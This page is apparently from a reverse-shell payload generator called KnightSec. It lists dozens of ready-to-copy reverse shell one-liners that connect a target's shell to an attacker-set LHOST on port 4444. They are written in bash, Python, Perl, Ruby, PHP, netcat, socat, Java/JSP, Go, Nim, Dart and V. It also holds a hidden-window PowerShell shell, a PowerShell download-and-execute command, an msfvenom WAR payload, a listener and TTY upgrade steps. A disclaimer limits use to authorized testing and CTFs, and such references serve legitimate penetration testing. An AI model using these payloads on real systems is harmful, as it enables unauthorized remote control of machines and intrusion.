// Tools
Reverse shells, bind shells, web shells, MSFVenom, PowerShell, encoders and file-transfer one-liners — with live LHOST/LPORT substitution, matching listeners, TTY upgrade steps, and educational breakdowns.
For authorized security testing, CTF play and educational use only. You are responsible for ensuring you have permission to test any system you target. KnightSec assumes no liability for misuse.
// set LHOST to see substituted payloads
// Shells that connect back to your listener. Requires outbound TCP from the target.
bash -i >& /dev/tcp/{LHOST}/4444 0>&1exec 196<>/dev/tcp/{LHOST}/4444; bash <&196 >&196 2>&196mkfifo /tmp/f; bash -i <>/tmp/f 2>&1 | nc {LHOST} 4444 >/tmp/f; rm /tmp/fbash -i >& /dev/udp/{LHOST}/4444 0>&10<&196; exec 196<>/dev/tcp/{LHOST}/4444; sh <&196 >&196 2>&196rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc {LHOST} 4444 > /tmp/fbusybox nc {LHOST} 4444 -e shpython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{LHOST}",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'export RHOST="{LHOST}"; export RPORT=4444; python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("{LHOST}",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'perl -e 'use Socket;$i="{LHOST}";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"{LHOST}:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'ruby -rsocket -e'f=TCPSocket.open("{LHOST}",4444).to_i;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",f,f,f)'ruby -rsocket -e 'exit if fork;c=TCPSocket.new("{LHOST}","4444");$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.empty?;(IO.popen(l,&method(:print))rescue nil)}'php -r '$sock=fsockopen("{LHOST}",4444);exec("/bin/bash -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("{LHOST}",4444);passthru("/bin/bash -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("{LHOST}",4444);system("/bin/bash -i <&3 >&3 2>&3");'php -r '$sock=fsockopen("{LHOST}",4444);popen("/bin/bash -i <&3 >&3 2>&3","r");'nc -e /bin/bash {LHOST} 4444rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc {LHOST} 4444 > /tmp/fncat {LHOST} 4444 -e /bin/bashncat --udp {LHOST} 4444 -e /bin/bashTF=$(mktemp -u); mkfifo $TF && telnet {LHOST} 4444 0<$TF | /bin/bash 1>$TFmkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect {LHOST}:4444 > /tmp/s; rm /tmp/ssocat TCP:{LHOST}:4444 EXEC:/bin/bashsocat TCP:{LHOST}:4444 EXEC:'/bin/bash,pty,stderr,setsid,sigint,sane'awk 'BEGIN{s="/inet/tcp/0/{LHOST}/4444";while(42){do{printf"$ "|&s;s|&getline c;if(c){while((c|&getline)>0)print$0|&s;close(c)}}while(c!="exit")close(s)}}' /dev/nulllua5.1 -e 'local h,p="{LHOST}",4444;local s=require("socket");local t=s.tcp();t:connect(h,p);while true do local c,_=t:receive();if not c then break end;local f=io.popen(c,"r");local r=f:read("*a");f:close();t:send(r)end;t:close()'echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","{LHOST}:4444");cmd:=exec.Command("/bin/bash");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/r.go && go run /tmp/r.go &Runtime r=Runtime.getRuntime();Process p=r.exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/{LHOST}/4444;cat <&5 | while read line; do $line 2>&5 >&5; done"});p.waitFor();String[] c={"/bin/bash","-c","exec 5<>/dev/tcp/{LHOST}/4444;cat <&5|while read l;do $l 2>&5 >&5;done"};ProcessBuilder pb=new ProcessBuilder(c);pb.redirectErrorStream(true);pb.start().waitFor();msfvenom -p java/shell_reverse_tcp LHOST={LHOST} LPORT=4444 -f war -o shell.war<%@ page import="java.io.*,java.net.*" %>
<%
String host = "{LHOST}";
int port = 4444;
Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-i"});
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
while (pi.available() > 0) so.write(pi.read());
while (pe.available() > 0) so.write(pe.read());
while (si.available() > 0) po.write(si.read());
so.flush(); po.flush();
Thread.sleep(50);
try { p.exitValue(); break; } catch (Exception e) {}
}
p.destroy(); s.close();
%>powershell -nop -w hidden -c "$c=New-Object Net.Sockets.TcpClient('{LHOST}',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$rb=([text.encoding]::ASCII).GetBytes($r2);$s.Write($rb,0,$rb.Length);$s.Flush()};$c.Close()"powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://{LHOST}:4444/shell.ps1')"powershell -nop -w hidden -enc {PS-B64}# nim c -r shell.nim
import net, os, osproc, strutils
let s = newSocket()
s.connect("{LHOST}", Port(4444))
while true:
let cmd = s.recvLine()
if cmd.strip() == "": continue
let (output, _) = execCmdEx(cmd.strip())
s.send(output)
s.close()// dart run shell.dart
import 'dart:io';
import 'dart:convert';
void main() {
Socket.connect('{LHOST}', 4444).then((s) {
s.listen((data) {
Process.start('/bin/bash', []).then((p) {
p.stdin.writeln(utf8.decode(data));
p.stdout.pipe(s);
p.stderr.pipe(s);
});
});
});
}// v run shell.v
import net
import os
fn main() {
mut s := net.dial_tcp('{LHOST}:4444') or { panic(err) }
for {
line := s.read_line()
if line == '' { break }
res := os.execute(line.trim_space())
s.write_string(res.output) or {}
}
}// Listener
default — copy a payload to sync
rlwrap -cAr nc -lvnp 4444rlwrap adds readline support (↑↓ history, Ctrl-A/E). Best default.
// TTY Upgrade
A raw nc shell has no job control, no arrow keys, and Ctrl-C kills the listener. Run these steps after catching the shell to upgrade it.
python3 -c 'import pty;pty.spawn("/bin/bash")'Why: Python's `pty` module allocates a real pseudo-terminal. After this, tab completion and arrow keys work inside the shell.
Ctrl-ZWhy: Suspends the remote shell and returns you to your local terminal so you can change its settings.
stty raw -echo; fgWhy: `stty raw` passes every keystroke (including Ctrl-C) directly to the remote. `-echo` stops your local terminal from echoing characters. `fg` brings the backgrounded shell back to the foreground.
export TERM=xterm-256colorWhy: Tells programs on the remote what the terminal supports — colours, cursor movement, clear screen. Required for vim, htop, less, and any tool that uses ncurses.
stty rows 40 columns 180Why: Matches the remote shell's idea of the terminal dimensions to your actual window (180×40). Without this, line-wrapping and pager output will be misaligned. Run `stty size` locally first to verify.
Step 05 dimensions (180×40) are estimated from your current browser window. Run stty size in your local terminal for the exact values before copying.